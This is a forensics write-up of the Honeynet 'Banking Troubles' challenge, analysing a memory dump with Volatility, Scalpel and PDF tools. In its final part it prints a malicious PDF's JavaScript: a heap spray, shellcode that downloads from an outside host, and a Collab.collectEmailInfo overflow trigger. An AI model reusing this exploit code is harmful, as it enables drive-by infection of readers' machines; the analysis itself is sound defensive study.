This challenge is about analysing a memory dump. Since it was my first time doing this, I referred to a writeup. I got to know the Volatility tool for the first time and feel I have picked up a reasonable grip on how to use it, which is rather satisfying.
http://www.honeynet.org/challenges/2010_3_banking_troubles
1. List the processes that were running on the victim’s machine. Which process was most likely responsible for the initial exploit? (2pts)
The process list can be obtained with Volatility (https://www.volatilesystems.com/default/volatility).
The batch file (http://volatility.googlecode.com/files/vol-Report%28win%29.zip) makes the analysis more convenient.
See http://ykei.egloos.com/5054373 for more details.
D:\Security Tools\Forensic\Volatility-1.3_Beta>c:\Python27\python.exe volatility pslist -f Bob.vmem
Name             Pid   PPid  Thds  Hnds  Time
System           4     0     58    573   Thu Jan 01 00:00:00 1970
smss.exe         548   4     3     21    Fri Feb 26 03:34:02 2010
csrss.exe        612   548   12    423   Fri Feb 26 03:34:04 2010
winlogon.exe     644   548   21    521   Fri Feb 26 03:34:04 2010
services.exe     688   644   16    293   Fri Feb 26 03:34:05 2010
lsass.exe        700   644   22    416   Fri Feb 26 03:34:06 2010
vmacthlp.exe     852   688   1     35    Fri Feb 26 03:34:06 2010
svchost.exe      880   688   28    340   Fri Feb 26 03:34:07 2010
svchost.exe      948   688   10    276   Fri Feb 26 03:34:07 2010
svchost.exe      1040  688   83    1515  Fri Feb 26 03:34:07 2010
svchost.exe      1100  688   6     96    Fri Feb 26 03:34:07 2010
svchost.exe      1244  688   19    239   Fri Feb 26 03:34:08 2010
spoolsv.exe      1460  688   11    129   Fri Feb 26 03:34:10 2010
vmtoolsd.exe     1628  688   5     220   Fri Feb 26 03:34:25 2010
VMUpgradeHelper  1836  688   4     108   Fri Feb 26 03:34:34 2010
alg.exe          2024  688   7     130   Fri Feb 26 03:34:35 2010
explorer.exe     1756  1660  14    345   Fri Feb 26 03:34:38 2010
VMwareTray.exe   1108  1756  1     59    Fri Feb 26 03:34:39 2010
VMwareUser.exe   1116  1756  4     179   Fri Feb 26 03:34:39 2010
wscntfy.exe      1132  1040  1     38    Fri Feb 26 03:34:40 2010
msiexec.exe      244   688   5     181   Fri Feb 26 03:46:06 2010
msiexec.exe      452   244   0     -1    Fri Feb 26 03:46:07 2010
wuauclt.exe      440   1040  8     188   Sat Feb 27 19:48:49 2010
wuauclt.exe      232   1040  4     136   Sat Feb 27 19:49:11 2010
firefox.exe      888   1756  9     172   Sat Feb 27 20:11:53 2010
AcroRd32.exe     1752  888   8     184   Sat Feb 27 20:12:23 2010
svchost.exe      1384  688   9     101   Sat Feb 27 20:12:36 2010
As for the process in which the exploit ran: the trouble reportedly started after a PDF file was opened, so AcroRd32.exe is the most likely candidate.
AcroRd32.exe has PID 1752 and PPID 888, and PID 888 is firefox.exe; AcroRd32.exe was started 30 seconds after firefox.exe.
So the infection can be attributed to a PDF file being opened from the Firefox browser. Two further details in the list are worth keeping in mind: msiexec.exe (PID 452) shows 0 threads and -1 handles, which is how a process that has already exited but whose EPROCESS has not yet been freed appears, and svchost.exe PID 1384 was started by services.exe at 20:12:36, thirteen seconds after AcroRd32.exe, whereas every other svchost.exe instance dates from boot time.
2. List the sockets that were open on the victim’s machine during infection. Are there any suspicious processes that have sockets open? (4pts)
D:\Security Tools\Forensic\Volatility-1.3_Beta>c:\Python27\python.exe volatility connscan2 -f Bob.vmem
Local Address             Remote Address            Pid
------------------------- ------------------------- ------
192.168.0.176:1176        212.150.164.203:80        888
192.168.0.176:1189        192.168.0.1:9393          1244
192.168.0.176:2869        192.168.0.1:30379         1244
192.168.0.176:2869        192.168.0.1:30380         4
0.0.0.0:0                 80.206.204.129:0          0
127.0.0.1:1168            127.0.0.1:1169            888
192.168.0.176:1172        66.249.91.104:80          888
127.0.0.1:1169            127.0.0.1:1168            888
192.168.0.176:1171        66.249.90.104:80          888
192.168.0.176:1178        212.150.164.203:80        1752
192.168.0.176:1184        193.104.22.71:80          880
192.168.0.176:1185        193.104.22.71:80          880
Looking up PID 1752 (AcroRd32.exe) gives a connection to 212.150.164.203:80, and the Firefox browser (PID 888) also has a connection to 212.150.164.203:80. A PDF reader opening its own HTTP connection to the very host the browser fetched the document from is the suspicious socket here. The two connections from svchost.exe (PID 880) to 193.104.22.71:80 are also worth a closer look, since svchost.exe normally only reaches the Internet for services such as Windows Update, and the entry with PID 0 (0.0.0.0:0 to 80.206.204.129:0) belongs to no listed process; connscan2 also finds freed or partly overwritten connection objects, so that one may be stale.
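To avoid mapping PIDs to process names by eye, here is an added Python example (not part of the original post and not part of Volatility) that joins the connscan2 rows to the pslist rows by PID and flags every socket to a non-private address from a process that is not expected to talk to the Internet. The allowlist of expected network processes is an assumption made for the example; the input text is a subset of the two outputs above.

```python
import ipaddress
import re

# Sample input: a subset of the pslist rows and the full connscan2 output
# copied from the Volatility output for Bob.vmem above. Other dumps produce
# the same column layout and parse the same way.
PSLIST = """\
Name Pid PPid Thds Hnds Time
System 4 0 58 573 Thu Jan 01 00:00:00 1970
svchost.exe 880 688 28 340 Fri Feb 26 03:34:07 2010
svchost.exe 1244 688 19 239 Fri Feb 26 03:34:08 2010
firefox.exe 888 1756 9 172 Sat Feb 27 20:11:53 2010
AcroRd32.exe 1752 888 8 184 Sat Feb 27 20:12:23 2010
"""

CONNSCAN = """\
Local Address Remote Address Pid
------------------------- ------------------------- ------
192.168.0.176:1176 212.150.164.203:80 888
192.168.0.176:1189 192.168.0.1:9393 1244
192.168.0.176:2869 192.168.0.1:30379 1244
192.168.0.176:2869 192.168.0.1:30380 4
0.0.0.0:0 80.206.204.129:0 0
127.0.0.1:1168 127.0.0.1:1169 888
192.168.0.176:1172 66.249.91.104:80 888
127.0.0.1:1169 127.0.0.1:1168 888
192.168.0.176:1171 66.249.90.104:80 888
192.168.0.176:1178 212.150.164.203:80 1752
192.168.0.176:1184 193.104.22.71:80 880
192.168.0.176:1185 193.104.22.71:80 880
"""

# Processes expected to open outbound connections on this host. This allowlist
# is an assumption for the example, not something Volatility provides.
EXPECTED_NETWORK_PROCS = {"firefox.exe"}

CONN_RE = re.compile(r"^(\S+):(\d+)\s+(\S+):(\d+)\s+(\d+)$")


def parse_pslist(text):
    """Map PID -> image name from pslist output (the header line is skipped)."""
    procs = {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 2 or not parts[1].isdigit():
            continue
        procs[int(parts[1])] = parts[0]
    return procs


def parse_connscan(text):
    """Yield (local_ip, local_port, remote_ip, remote_port, pid) rows."""
    for line in text.splitlines():
        m = CONN_RE.match(line.strip())
        if m:
            yield m.group(1), int(m.group(2)), m.group(3), int(m.group(4)), int(m.group(5))


def triage(pslist_text, connscan_text):
    """Join sockets to process names and flag connections to public addresses
    from processes that are not expected to reach the Internet.

    Returns a sorted, de-duplicated list of (pid, name, "remote_ip:port").
    """
    procs = parse_pslist(pslist_text)
    flagged = set()
    for _lip, _lport, rip, rport, pid in parse_connscan(connscan_text):
        if ipaddress.ip_address(rip).is_private:
            continue  # LAN and loopback traffic is not interesting here
        name = procs.get(pid, "<no process>")  # not in pslist: exited or unlinked
        if name in EXPECTED_NETWORK_PROCS:
            continue
        flagged.add((pid, name, f"{rip}:{rport}"))
    return sorted(flagged)


if __name__ == "__main__":
    for pid, name, remote in triage(PSLIST, CONNSCAN):
        print(f"{name:>14} (PID {pid:>4}) -> {remote}")
```

On the data above this prints the AcroRd32.exe and svchost.exe (PID 880) sockets plus the orphaned PID 0 entry, and drops everything Firefox did; the same join is what you would repeat after dumping the other suspicious processes.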
3. List any suspicious URLs that may be in the suspected process’s memory. (2pts)
strings Bob.vmem | grep http > output.txt
The command above saves the matches to output.txt. There are far too many of them -_-
Note that this searches the whole image rather than the memory of the suspected process; running strings over the process dump of PID 1752 (produced in question 5) narrows the list down considerably, and with GNU strings `-e l` should be run as well so that UTF-16 strings are not missed.
4. Are there any other processes that contain URLs that may point to banking troubles? If so, what are these processes and what are the URLs? (4pts)
Searching the list saved in step 3 with the command below gives the following result. The leading "A" is simply the printable byte that precedes each URL in memory, and the "#" and "*" make these look like wildcard patterns for matching bank URLs rather than URLs that were actually visited, so the process holding them matters more than the URL itself; which process that is can be established by repeating the strings search on per-process dumps instead of the whole image.
D:\Security Tools\Forensic\Volatility-1.3_Beta>grep bank output.txt
Ahttps://onlineeast#.bankofamerica.com/cgi-bin/ias/*/GotoWelcome
Ahttps://onlineeast#.bankofamerica.com/cgi-bin/ias/*/GotoWelcome
Ahttps://onlineeast#.bankofamerica.com/cgi-bin/ias/*/GotoWelcome
[... rest omitted]
5. Were there any files that were able to be extracted from the initial process? How were these files extracted? (6pts)
First, use Volatility to dump the memory of the process with PID 1752.
D:\Security Tools\Forensic\Volatility-1.3_Beta>c:\Python27\python.exe volatility usrdmp_ex_2 -f Bob.vmem -p 1752
After saving the dump, configure Scalpel's conf file so that only PDF files are carved (the pdf entry in scalpel.conf, header %PDF to footer %%EOF) and run it against the dump; this yields a total of 9 files.
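As an added example (not part of the original post and not Scalpel's own code), here is the same carving rule as Scalpel's pdf entry, header %PDF to footer %%EOF, written in Python so the logic is visible. It bounds each carve by the next %PDF- header instead of blindly taking the last footer within the size limit, so an incrementally updated PDF (several %%EOF markers) is carved whole without swallowing the file that follows it. The input buffer is constructed for the example; on a real case, feed it the process dump produced by the command above.

```python
import os
import re
import sys

HEADER = b"%PDF-"
FOOTER_RE = re.compile(rb"%%EOF[\r\n]+")   # footer plus its line ending
MAX_SIZE = 5_000_000                        # same cap as scalpel's pdf rule

# Constructed sample: junk, a PDF with one incremental update (two %%EOF
# markers), more junk, a second PDF, and a header with no footer at all.
SAMPLE = (
    b"\x00\x11junk before\x00"
    b"%PDF-1.5\n1 0 obj << /Type /Catalog >> endobj\ntrailer << /Root 1 0 R >>\n%%EOF\n"
    b"11 0 obj << /S /JavaScript /JS 1054 0 R >> endobj\ntrailer\n%%EOF\r\n"
    b"\x90\x90 more junk "
    b"%PDF-1.4\n2 0 obj << >> endobj\n%%EOF\n"
    b"%PDF-1.3\ntruncated, no footer"
)


def carve_pdfs(data, max_size=MAX_SIZE):
    """Return a list of (offset, bytes) for every %PDF-...%%EOF region.

    The search window for a header ends at the next %PDF- header (or at
    max_size), and the last %%EOF inside that window wins, which keeps
    incrementally updated files intact.
    """
    carved = []
    pos = 0
    while True:
        start = data.find(HEADER, pos)
        if start == -1:
            break
        next_hdr = data.find(HEADER, start + len(HEADER))
        limit = start + max_size if next_hdr == -1 else min(start + max_size, next_hdr)
        window = data[start:limit]
        footers = list(FOOTER_RE.finditer(window))
        if footers:
            end = footers[-1].end()
            carved.append((start, window[:end]))
            pos = start + end
        else:
            pos = start + len(HEADER)  # header without footer: truncated, skip it
    return carved


def pdf_version(blob):
    """The version in the header, as `file` reports it, or None if malformed."""
    m = re.match(rb"%PDF-(\d\.\d)", blob)
    return m.group(1).decode() if m else None


def save_carved(carved, outdir):
    """Write carved files with scalpel-style names (00000000.pdf, ...)."""
    os.makedirs(outdir, exist_ok=True)
    paths = []
    for i, (_offset, blob) in enumerate(carved):
        path = os.path.join(outdir, f"{i:08d}.pdf")
        with open(path, "wb") as fh:
            fh.write(blob)
        paths.append(path)
    return paths


if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE
    for offset, blob in carve_pdfs(data):
        print(f"offset {offset:#x}: {len(blob)} bytes, version {pdf_version(blob)}")
```

Running it on the constructed buffer yields two files and skips the truncated third header; headerless or footerless fragments are exactly what produced the "data" entries that `file` reports for the first carved files below.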
6. If there was a file extracted from the initial process, what techniques did it use to perform the exploit? (8pts)
First, checking the carved files with the file command gives the following.
D:\Security Tools\Forensic\scalpel-1.60\pdf\pdf-0-0>file *
00000000.pdf: data
00000001.pdf: data
00000002.pdf: PDF document, version .
00000003.pdf: PDF document, version %..
00000004.pdf: PDF document, version 1.5
00000005.pdf: PDF document, version 1.5
00000006.pdf: PDF document, version 1.5
00000007.pdf: PDF document, version 1.4
00000008.pdf: PDF document, version 1.3
Only files 4 to 8 look like well-formed PDFs (files 0 to 3 are carving false positives or truncated), so checking those with PDFiD (http://blog.didierstevens.com/2009/03/31/pdfid/) shows that file 6 contains JavaScript (/JS 1, /JavaScript 1), that it is triggered through an additional action (/AA 1, while /OpenAction is 0) and that the document carries an /Encrypt dictionary.
Below is the PDFiD output for file 6, followed by the pdf-parser (http://blog.didierstevens.com/programs/pdf-tools/) output.
D:\Security Tools\Forensic\scalpel-1.60\pdf\pdf-0-0>pdfid.py 00000006.pdf
PDFiD 0.0.10 00000006.pdf
PDF Header: %PDF-1.5
obj 113
endobj 113
stream 35
endstream 35
xref 5
trailer 5
startxref 4
/Page 9
/Encrypt 1
/ObjStm 0
/JS 1
/JavaScript 1
/AA 1
/OpenAction 0
/AcroForm 0
/JBIG2Decode 0
/RichMedia 0
/Colors > 2^24 0
D:\Security Tools\Forensic\scalpel-1.60\pdf\pdf-0-0>pdf-parser.py --search javascript 00000006.pdf
obj 11 0
Type:
Referencing: 1054 0 R
[(1, '\r\n'), (2, '<<'), (2, '/S'), (2, '/JavaScript'), (2, '/JS'), (1, ' '), (3, '1054'), (1, ' '), (3, '0'), (1, ' '), (3, 'R'), (2, '>>'), (1, '\r\n')]
<<
/S /JavaScript
/JS 1054 0 R
>>
pdf-parser lists two definitions of object 11 0; the second one, carrying the /JavaScript action, references the stream in object 1054:
D:\Security Tools\Forensic\scalpel-1.60\pdf\pdf-0-0>pdf-parser.py -o 11 00000006.pdf
obj 11 0
Type:
Referencing:
[(1, '\r'), (3, '0'), (1, ' \r')]
obj 11 0
Type:
Referencing: 1054 0 R
[(1, '\r\n'), (2, '<<'), (2, '/S'), (2, '/JavaScript'), (2, '/JS'), (1, ' '), (3, '1054'), (1, ' '), (3, '0'), (1, ' '), (3, 'R'), (2, '>>'), (1, '\r\n')]
<<
/S /JavaScript
/JS 1054 0 R
>>
Dumping object 1054 with its filters applied. Note that /Length is 0000 and that the two filter names are written with #xx hex escapes (/F#6c#61#74e#44e#63#6fde is /FlateDecode and /#41#53#43II#38#35#44#65#63#6fd#65 is /ASCII85Decode), a common trick to evade signatures that match on the filter name:
D:\Security Tools\Forensic\scalpel-1.60\pdf\pdf-0-0>pdf-parser.py -o 1054 --raw --filter 00000006.pdf
obj 1054 0
Type:
Referencing:
Contains stream
<</Length 0000/Filter [/F#6c#61#74e#44e#63#6fde/#41#53#43II#38#35#44#65#63#6fd#65]>>
<<
/Length 0000
/Filter [
/FlateDecode /ASCII85Decode]
>>
var xtdxJYVm='011110000010101100000111001011110010000100110111000111110001101100101111010011110010010100110000000100010010011100000010011010010000001100011110001111110010100100101100010000100000001100001101000000110011100000100011010010000010110000011000000100000010111000111001000000100101100100011100000110010010001000011111000000100101110100000000000111110011011100100101001001100010001001101111011111100100101100101001001100100010111100110010001011010110011000101011001110110011001100111001000000000000110101111000011110000001010000110010001110000000001100001011011010000001010001101100001101110010101100011010001110110000010100111001011100010000001000000010001010000000001100110011010001000011110000100100000001100000101100100001001000010010001100000000000101100100111101111011010101100010000100101110000101000010010100111000011010000111010001000101011110010011000101011000001100100011100000111011001001100000001100110000000000110001101001010001000000010010001000011000001101100001111001001111011110100011100000000110001011010001010101100001001011110010001000001100000111010010100001000100001111000000111100111100011011010100100100001010000110110010011001010010010110010100101100110100000101000111011100110111010001100111110100010110000011000111011001011001010011100100000000111001000001010111111000010010011001010101100100001001001000100101101001101001010111110010101100010010000000100101011100011000010010000010111000010000001111000100100100010100011011010110000000101010000001010101010000110001001011010010111000111001000011000110000001001110010111010111010000110110000111100100100001001110000101110001000000010101000100110100011001110110011010000000101000010000000110010101110100100111010100100100111000110100000101000110111100100000011000110111011100011101001100100101111001011011010110010001011000101010000101100101000000110001010001100001001000001001000100110111001100000010011101010101101000110101000001100001110101100100000010100111010100001011001001110001001001111111010111010011101100
11000100010011001101110000011101011001000101000000010000111001010110010001001100001100000110110011111100100100011111110100010101111110001000100000100100000001001001000010111101010000010111100010101100100100010011000111101001111011010000110000100000010010011001110111000001100000011100010001001000011000010000010111100001001100010111100000011000000111010111110100010001100000000011010011101000001100010100100000011101100000001010010011101000111110010100000111001001111011010101110001010100000011011110110101010001111100010000000011001100011110010101000111000000101001010001010000111000010010010011100100111101111100001001100010010100011111011001100101111001011001010001110010100000011001011000000100101100111100011001110000100100000100010011000100101000101110011010000011100100101111010100010100000101011010010111010001100100010111011110000101100000101000000101110011001000111101011001010101110100010100000100100010111000000011001000110011000001010110001011110011101000011010011111010100000001000011010110110011011100011101001101000111101101011111011110110001110100100111011111100100100001111011011101110001111000010010000010110001000100100000011111000011010000011001011100100111110001110010000000100001101100101100010110000111111000010100001011000011010000101111000101000010111100100010000000110011010000100110010110000001001101010100011101000010101000001111010000010111110000000010010101000011101000010100010001110001011000101111010101000011000000011001010100100110011001111001001000000011000000110001010100010101100101100101011101010011011000110100011000010111111000110111010111000010010000111110010111010011000001011100001010000000110000110000011110010000000001110001010100100001100100100110011111110001100101000110010000010010100100001111001101010111110101010111011100100001000000111010011000100110000001001011001110100000100000011101010100110101011101101110001110110001010100010100011011000011011100101011011000100001100100111011010100010101010101011110000101110001110100110110011110010001001000
01100101111100000011000010000101000110011100000100001000101011001111010010111101010110011000000100001101111001000011110001111001110001010101110011100001011101001100100001110101001000000000100011100100000101000111100011000100101101010000010110011000110010000100100010010000000111001011010010101001100001000101100010011000001111000001000010110100101110000110010001100000110100010001100110011001010011000011000010011100000011011011100110101100010101001100110011110000000011000001100001111101010101001100000011011100100101011101100100110100100000001011110000011001110111000000110100011101101111000011000000001001100111010111010111110001111000000100100001101101111001011011100010011100010100000010000001011001011011011000010110000001110010000110000011101100110110011100010001011100101111000100010010110001110010000110000111010100111011001011000010001001000001010010110000001101011110000011100011011001100110011101010100110101001010001010010001101101000100001000010111010000101000001110110000010101001110011001110110001100110010000100110010110101001111010001100111001101111011001010110000011101100001000110110100001101111001000011100010000001001101011101100100000000101101001100100010110001010010001010000011011001101111001100100010001001000011001010100101000000001101001110110010010000111100000111110001011000000110000011010011000001011000011100100100010001110000001001000000000101110010011100100110111101000110001001010011001100010011011111100100010101000110001101100000011101100001011110110100110001110001001100110011111101001111000010100101100001000111001001010001010001111110010100000100011001001100001101010010110000010010010000000100111001100011001111010001001101111100010001110101011000001101001011000011011101101001011101000011011001010011000110100000000001101101011001110111111001111111001001000000011001001010011110100010010101101101000101000001010001111110000000110101111000010001001010110000000100101001000101000111101001010101000101010001100101010100010011100101000101110110001111010000000001
00001101111100011001110001010000010110000110100110011101100110001111100000001000110100000100010011010101010011010001000100110000110100001111010000111000101100010010110100110000101000000110110111111100101111010100100010100000011001000100110101100001011010001100110011001000010001000110000100111101110101011101110111001100110000001100110001010000100111001100000101010100010011001111010010011101000101001000100001011100001010001001110011110000000000010110010110000000000110000000110111000101111001010100100110000000101000000011000110001101111100010100110101101100010011000101100100011001001001010001110111000000011010001101000110001000101111011010110011010000011001001011110111110101101010011111100010110000110010000110010110000001011001010001000100001100001100001111110101100001010001011101000100010000100100001100100111010000000101011110000111011100011010000110000101110001001111011110010001001100100110001101110101100101000000010110100110000000010100000101000110110101110111011001110000000100010011001000110111001100110111010111010011000100010100001100010110011100001000010100000111001000011000000101000101110101110111011110110101010000001010000001100111010101011011011000010000011100110001000110110110111100100011010110110011001000001110001000100110001000001101011000000001011000001010001100000101001101000100011000110011011100111111001100100111011000001011010001110111100000001000000110110100001001101101010111100110010100110101000111000100101000101100010101100101101100000110001011110101010000000111010001110100100000011001001101110111100001011000011001010110011000010101000100100100011001111010011000000111111000001001001001000100000001101100011000010000001100011110001000000111011001000100011110010011111100010011000011110101110101100110011110100111011000000101001100110110110001011011011110010010111100011110000000000110000001000111010110000110011100101000000011110110000001100001011000010110110100110000000110010110000100010010011001100110011000110000001000110100110101011111011111100011010100
01101100000101010001010101110001110011010111110010101000011000010000100101000101011110011101000001101000110010010000000101101001100000001101100001000000011101011011100110001101011100010110010011001100110001010110000100010001110110001010110011100000111000010000000101100101110111011000000101001001111010010110000110000101010010010000010110010001000101010011000110110001111001010001010110111101001010011100100100111001011000010111100110100101101000011001010110000101001010010101010110011101100100010100000101011001100111010000100101001101100000010001000111001001100100011000110110011101011111011010010001110100110011001100000111001100011110001110010001101100111010000011110100101001001011011101000101111001110000011010000111010001110010011111110111001101001011000000100010001000111101011011000001111100010011000100010001000100001111010011000011100100001100011110010010001100110110000111010101001100000111000111110011111100010000000101010110011101111100011100110110110001111100010010010111010101100110010110100010010000010110000010100101001000001101000000010000011100001010001011110101011100001101001110010010101000111011001010100100001000011010000111000000001000010000001110010010010101000010010111000110111000010000000100000001010101101010000010100000101100011000001110000000001101011001001011110011111000110111000100010000011001111000011001110011110000000000001101000011010100001000010001100111001100000000011001100110110001111000011111010011000100010011000001010101011000000001001100110010101000000101001001010100110000100000000101100001100001100010011100100010101000000100010011110101110101111000011110100011101000111000011010110110010101010010011101100111010001101011011111000001111000011001000000110001100100111111010011110011100000001011000100010011100000100100011011100011011000101110001111100010001100111100011000000001000100011111000111010000011100110010010001110111110000000010001101100010010101010101000110000000001000011100001100000001010101101010011001010000011000110001000111110001010100
00011101110111011100010101011101001111010000000101011101101001010111010110010101000011001010110010010000111011001001110010111101111100000000000011111000111101010111100001101100100010001111000101010100000011000001110000010000100011001111110110010001010101011010110011010100000000000010010000010000110010010101110001101000001111000100000000011000100000010101000010110100010110001001110010110000001111011110010100000101100001000101000011111100000010001011010001101100101100000010010010001000010111001000010001100000001001001011000100101100110000000000100011011100101110001110100110111000110010000110110000001000100100001000010111110100011110011011000000001000000110000000100110111000100001000110010010100100000101000001010110100000100101001010010011110101011000010000000010101100110100010111010011011101000100001000010001000100110111010111100010010001010110000010100110011101000000010100000000011000001100000110110010101000100010010001100001011000000000001011100000001100001000011000100011111100000011000101000000001000101101000010100101101001110010011110100101011001010001010101010101111100101011001111110011111000100001000001110101001101101011000001000000011100100000001111110011111101010011001000100011111100101101001101110100110000101111000001110001010000011001000011100010110000011010000001000000000000110011000011110111011100010001001101100010111000111001001000100010111101001011000001000011110100011000000110000000011000000100001100100001110100000010000011100011110000100100000110010001110000000001000000100100010000101111000100000011101000000101001110000101000101010010011010110101010100100100001001010001010101010010000101100010011000001010000000100000101100100111010100010101010100110011011100000000000000011000000000000010000000110111000000000001100100101111011101010001011100010101001111010110101001011100000000100001111100001010001001000111010100110001001100100010101101100101000011110001000100111101011101100000110000111001001010000010100000101011011011110111111001111001000100010001101000
00010000000001000111010001110000100011000111110101001100010110000101100001100001100001001110100010001100000001010110110010001000011101001000010110111100101110001111000000011000111000001010100011111101011010001110000000110000001100011110000000100000111111000110010000000100000100001111000111000001011001010010110010001000000101000000000100011000101001001010000011000100101100011011000100011100100011000001000001100001111001001011000101001100101101001111110010100001100101001101110000010100101001010000110010100100110100001101010001010100000010000110000000111100111000001111100111000001111110011000000000101000001011001011000100100001010111011010110101000000011011000111110010010000110111000100110000010001100111000010110011111100100110011000010010110101100101000000010010000000000101010100000100101000001011011001100110001101101011011101110100001101001000011101000101001001111101001111110011100000100110011111110011110000101000001100110111100101010000001011000010000100011010011111110101011001110110000110110010001001000000000001100100000101011000000010010001100101000011011110100101010101000110001100100000000001000100000011000101101001110110000100110001001101011111011001000100000100101010001011100001110001100010001100110100101000111011000010110011110001110111000011110111111001100110001111100001110001110000001001010001101100000001000011100011011001010110010100100101000101011100001101110011100101000010011010010001001100010100001011100000111101110001010111010111000100000001000101010011110001100010001101010101110001000000000010000010000001001111000100110100011101100000001100100011111101111001011101000110110100110000000011100000001001000110001011000110011100110101000010000001110101010010000100010111011101100100000101110011101000010011010110100010100001111001000001100011100000100110011100000111110000100000001011010010111100110101000011010110100100111000001111110011011001011100001101100001111100001000000011110001100101111111010100000111011000111000001101110011100100100001000010100100110001
00011000111111001000110110000101001001010001010111100100110111001100000110011101111101011111010111110000111000000111100101111001011100011101000111111100101011001110000111100001011110011101100000111100001011001110000101011100100000011010110000010000110101000011010111101101110101010000000101101000110100001000000110001001100001011101010100100100001111001111010111110001011110001011000100001100010110000001010101100001110101011100100010011100010001000111000110001001010001010110010110011100111011001110110111000101100011000011000110001000111111001001010100011101110101000011000110001100000110001110100110010001000111011011000101110000001100001001110101010001110000000001010011110100001101000100100100010101100000001000110011000000011111000111110001011100101111011010000001111000101110000000110101000101000100010100110110011100101100001110000000100001111001011111110111010000001110000110000100000001100000010001100110001100011011001101000011000100011100000100100101010000101101001011000101111001111001011100100001011000101101001011000111000001111111000011100001011000001001001101000000000100110000001010010001000100101111001111100101010000100011010111000100000100011000001000110110011001110001001100000101010000011101000111000111111100110111001101000100000000011010001110000101001101111011010000010010100000110111000100000101000101000111011010110110011000000100001101100101001001011100001000010111111100001000000000110111001000100111010010110011100000110110001100010110101100001100011110010111110000111000001001100111001000001110011001010100011100001010000101100011011101000001010111000110001000101010001110000101000101111110011101100010101000111111000011000101110001001010010010000000010000110000000000000111111000010111000000100101010000101011000100010101100001100010011000110011000100111101001101000111011100101011001011010110001100000110000000010100011101110111010111110000100000101001001011010101011101111111011100100110111100001101001111110100011101001010000001110100111000000100001101110110110100
11000100001011000101000001011000110000001100010111010101100011000001110001001100011000000010000000110000001010010110100010100000010010001011100011011000101110001010000000101100100001000010000110011001001001010101000011101000110001001001010101001001000000001110100011111100011111000011110000000100011111011110100001111100101101001001010111110101110101000010110001001000011100010000110000101101111110010000100011100000101111011100100110101101011101011001100000110000111110010001100100111000010111001000010011111000011011011111110111011101011110010011000000100000000111001000000101011000100011000110110010111100101101011011010001001101111001001011010010110000000111010110100100000100000010011111010010101000100110010111010111000101000000011010100010111000111100011000110000010001110101001000110011101100110010010110100101000101010111001111000001101100101111011100010101100101000100011111010011010100100001011110100000000001011100011100010001011000001100010000010100001101011001000101110000111000000001011111100011011000001111011011110001111100110010011101010001010001100011001100000001011100011010001111100011000000100110000011100001100100010010010111100101100001111011011110100011011000000010011011000111100001101111011111010011000100100011000001100111101001110101010101110011010000010011011100100101111101111011011001100010100000100000011011000000100001001111010110110000101100011011010001100100111001000001011110000001101100010001001100010101101001111110011111000011100100010110011010010101100101111101001001000011101100111011010111110101100000011011011100000000010000011111011100000111110101000011011100010001101100110111011101110111011100100011011101100000010100111111011100110000001101010101000011000000011000111110001100100001010001100100010000100011000100000010010101000101000101011110010000010000100100110110010100000111111001110111001100110001000000010110010100100110001000000000000100100001101100010110000101010111100101100111010101010000101000100101000101110000010001001110010011000000101100
011001010100100010101001101110000110110000111100101111010110000100001000111110000000110001000100101101011000110100011101011111010001000010010000111010001111110010110000000011011000010000011000110110000100100100011100010011001000000001100100100111000101100000110001110000010010000000011000100101011010000111101101110010011101000010101000000111010011010100010001110111010111010000111000011111010110000110011001000110011011100001011000110010010101110010100101001011001100000
Decoding the script above gives the following.
function OzWJi(rzRoI,fxLUb){while(rzRoI.length*2<fxLUb){rzRoI+=rzRoI;}
return rzRoI.substring(0,fxLUb/2);}
function bSuTN(){var Uueqk=sly("\uC033\u8B64\u3040\u0C78\u408B\u8B0C\u1C70\u8BAD\u0858\u09EB\u408B\u8D34\u7C40\u588B\u6A3C\u5A44\uE2D1\uE22B\uEC8B\u4FEB\u525A\uEA83\u8956\u0455\u5756\u738B\u8B3C\u3374\u0378\u56F3\u768B\u0320\u33F3\u49C9\u4150\u33AD\u36FF\uBE0F\u0314\uF238\u0874\uCFC1\u030D\u40FA\uEFEB\u3B58\u75F8\u5EE5\u468B\u0324\u66C3\u0C8B\u8B48\u1C56\uD303\u048B\u038A\u5FC3\u505E\u8DC3\u087D\u5257\u33B8\u8ACA\uE85B\uFFA2\uFFFF\uC032\uF78B\uAEF2\uB84F\u2E65\u7865\u66AB\u6698\uB0AB\u8A6C\u98E0\u6850\u6E6F\u642E\u7568\u6C72\u546D\u8EB8\u0E4E\uFFEC\u0455\u5093\uC033\u5050\u8B56\u0455\uC283\u837F\u31C2\u5052\u36B8\u2F1A\uFF70\u0455\u335B\u57FF\uB856\uFE98\u0E8A\u55FF\u5704\uEFB8\uE0CE\uFF60\u0455\u7468\u7074\u2F3A\u732F\u6165\u6372\u2D68\u656E\u7774\u726F\u2D6B\u6C70\u7375\u632E\u6D6F\u6C2F\u616F\u2E64\u6870\u3F70\u3D61\u2661\u7473\u493D\u746E\u7265\u656E\u2074\u7845\u6C70\u726F\u7265\u3620\u302E\u6526\u323D\u0000%25%30%25%30%25%30%25%30%25%30%25%30");var HWXsi=202116108;var ZkzwV=[];var HsVTm=4194304;var EgAxi=Uueqk.length*2;var fxLUb=HsVTm-(EgAxi+0x38);var rzRoI=sly("\u9090\u9090");rzRoI=OzWJi(rzRoI,fxLUb);var tfFQG=(HWXsi-4194304)/HsVTm;for(var gtqHE=0;gtqHE<tfFQG;gtqHE++){ZkzwV[gtqHE]=rzRoI+Uueqk;}
var eHmqR=sly("\u0c0c\u0c0c");while(eHmqR.length<44952)eHmqR+=eHmqR;this.collabStore=Collab.collectEmailInfo({subj:"",msg:eHmqR});}
function Soy(){var dwl=new Array();function ppu(BtM,dqO){while(BtM.length*2<dqO){BtM+=BtM;}
BtM=BtM.substring(0,dqO/2);return BtM;}
